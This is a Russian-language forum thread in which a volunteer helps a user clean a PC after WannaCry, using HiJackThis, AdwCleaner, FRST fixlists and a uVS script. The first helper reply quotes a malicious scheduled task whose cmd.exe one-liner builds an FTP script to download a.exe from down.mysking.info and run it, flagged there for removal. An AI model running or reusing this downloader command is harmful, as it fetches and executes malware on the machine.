Трояны в System Memory

[Saltant]

Неоднократно в течении недели касперский антивирус находил в памяти трояна - Trojan.Multi.GenAutorunReg.a удалял, но он все равно появляется.

Проблема с троянами началась после того как комп подхватил WannaCry, при заражении работал антивирус касперского, троян wannacry был перехвачен и убит, ни какие файлы не пострадали, но вот после этого стали находится трояны в system memory (возможно совпадение, возможно нет). Прикрепляю все необходимые файлы логов. Помогите разобраться откуда лезут трояны.

 

CollectionLog-2017.06.03-18.42.zip

[SQ]

Здравствуйте,

HiJackThis (из каталога автологгера) профиксить

O8 - Extra context menu item: Закачать ВСЕ при помощи Download Master - (no file)
O8 - Extra context menu item: Закачать при помощи Download Master - (no file)
O8 - Extra context menu item: Передать на удаленную закачку DM - (no file)
O9-32 - Extra button: (no name) - HKLM\..\{8DAE90AD-4583-4977-9DD4-4360F7A45C74} - (no file)
O22 - Task (Ready): Mysa - C:\Windows\system32\cmd.exe /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe

- Подготовьте лог AdwCleaner и приложите его в теме.
 

[Saltant]

Выполнил все по пунктам, прикрепляю лог AdwCleaner

 

AdwCleanerC0.txt

[SQ]

Удалите Advanced SystemCare через установку программ в панели управления (если присутствует).


Удалите в AdwCleaner всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.

[Saltant]

Advanced SystemCare - нету в панеле управления удаления программ.

 

В AdwCleaner удалил всё предложенное еще при первом запуске (когда делал лог), там была какая то ерунда от mail.ru и этот Advanced SystemCare.

[SQ]

- Скачайте Farbar Recovery Scan Tool  и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

• Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
• Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5".
  
• Нажмите кнопку Scan.
• После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
• Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.
  

 

[Saltant]

Сканирование с помощью Farbar Recovery Scan Tool произведено, прикрепляю логи.

 

FRST.txt

Addition.txt

[SQ]

Знакома ли Вам настройка?

HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{551a7668-aec7-4407-ad57-7389b2c17629} <======= ATTENTION (Restriction - IP)

• Закройте и сохраните все открытые приложения.
• Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
  

  CreateRestorePoint:
  CloseProcesses:
  HKLM-x32\...\Run: [] => [X]
  File: C:\Program Files (x86)\puush\puush.exe
  HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
  FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
  FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [No File]
  FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
  CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
  File: C:\Windows\SysWOW64\srvany.exe
  S3 BRDriver64_1_3_3_7ECFDFEA; no ImagePath
  S3 BCM42RLY; system32\drivers\BCM42RLY.sys [X]
  2017-05-22 14:57 - 2017-06-03 16:12 - 00000060 _____ C:\Windows\system32\s
  2017-06-03 19:33 - 2017-03-24 20:46 - 00000000 ____D C:\Users\Администратор\AppData\Roaming\IObit
  2017-06-03 19:33 - 2017-03-24 20:46 - 00000000 ____D C:\Users\Администратор\AppData\LocalLow\IObit
  2017-06-03 19:33 - 2017-03-24 20:45 - 00000000 ____D C:\Users\Все пользователи\IObit
  2017-06-03 19:33 - 2017-03-24 20:45 - 00000000 ____D C:\ProgramData\IObit
  2017-04-16 21:26 - 2017-04-16 21:26 - 0000016 _____ () C:\ProgramData\mntemp
  File: C:\Users\Администратор\PCPE Setup.exe
  2006-05-24 08:10 - 2006-05-24 08:10 - 0455600 ____R (Macrovision Corporation) C:\Users\Saltant\AppData\Local\Temp\_is50DD.exe
  2017-04-18 22:27 - 2017-04-18 22:28 - 59432328 _____ () C:\Users\Администратор\AppData\Local\Temp\raptrpatch.exe
  2017-04-18 22:27 - 2017-04-18 22:27 - 0221632 _____ () C:\Users\Администратор\AppData\Local\Temp\raptr_stub.exe
  2017-05-04 21:48 - 2017-05-04 21:48 - 2085648 _____ (Vitzo Limited                                               ) C:\Users\Администратор\AppData\Local\Temp\tmp17D0.tmp.exe
  Task: {3D6AF505-229F-4F75-807C-E46B6339A852} - \Microsoft\Windows\Windows Activation Technologies\ValidationTask -> No File <==== ATTENTION
  Task: {90DEB20D-1982-4CAE-9CFD-C58993F1A336} - \Microsoft\Windows\Windows Activation Technologies\ValidationTaskDeadline -> No File <==== ATTENTION
  AlternateDataStreams: C:\ProgramData\TEMP:41ADDB8A [130]
  AlternateDataStreams: C:\ProgramData\TEMP:A064CECC [144]
  AlternateDataStreams: C:\ProgramData\TEMP:B242F995 [104]
  AlternateDataStreams: C:\Users\Все пользователи\TEMP:41ADDB8A [130]
  AlternateDataStreams: C:\Users\Все пользователи\TEMP:A064CECC [144]
  AlternateDataStreams: C:\Users\Все пользователи\TEMP:B242F995 [104]
  Reboot:

• Запустите FRST и нажмите один раз на кнопку Fix и подождите.
• Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
• Обратите внимание, что компьютер будет перезагружен.
  

[Saltant]

Настройка

HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{551a7668-aec7-4407-ad57-7389b2c17629} <======= ATTENTION (Restriction - IP)

Мне не знакома, по крайней мере я сам её не добавлял.

 

Прикрепляю лог FRST

 

Fixlog.txt

[SQ]

Мне не знакома, по крайней мере я сам её не добавлял.

Используете ли Вы VPN на ПК?

[Saltant]

Нет у меня интернет по Wi-Fi, вот скрин доступных подключений сети.

Изменено 3 июня, 2017 пользователем Saltant

[Saltant]

Видимо Oracle VirtualBox создало VPN у меня.

[SQ]

Скачайте программу Universal Virus Sniffer и сделайте полный образ автозапуска uVS.

[Saltant]

Прикрепляю лог созданный с помощью Universal Virus Sniffer

 

SALTANT-PK_2017-06-04_17-51-17.7z

[SQ]

Выполните скрипт в uVS:

;uVS v4.0.2 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
BREG
;---------command-block---------
delref WMI_.[FUCKYOUMM2_FILTER]
zoo %SystemRoot%\KMSEM\SHADOW.KMS
zoo %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\LOCAL\UMMYVIDEODOWNLOADER\UNINS000.EXE
delref %SystemDrive%\USERS\SALTANT\APPDATA\ROAMING\QIPGUARD\QIPGUARD.EXE
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.32.7\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.32.7\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.3\PSMACHINE.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\UPDATE\1.3.33.3\PSMACHINE_64.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\JAVA\JRE1.8.0_121\BIN\JP2IEXP.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\JAVA\JRE1.8.0_45\BIN\JP2IEXP.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\JAVA\JRE1.8.0_51\BIN\JP2IEXP.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\JAVA\JRE1.8.0_66\BIN\JP2IEXP.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\JAVA\JRE1.8.0_71\BIN\JP2IEXP.DLL
delref %SystemDrive%\PROGRAM FILES\JAVA\JRE1.8.0_131\BIN\NPJPI160_43.DLL
delref %SystemDrive%\PROGRAM FILES\JAVA\JRE1.8.0_131\BIN\NPJPI180_131.DLL
delref %SystemDrive%\PROGRAMDATA\SSWTOOL\APP\XSERVICE.EXE
delref %SystemDrive%\USERS\836D~1\APPDATA\LOCAL\TEMP\CHROME_BITS_12372_20234\393_ALL_STHSET.CRX
apply

restart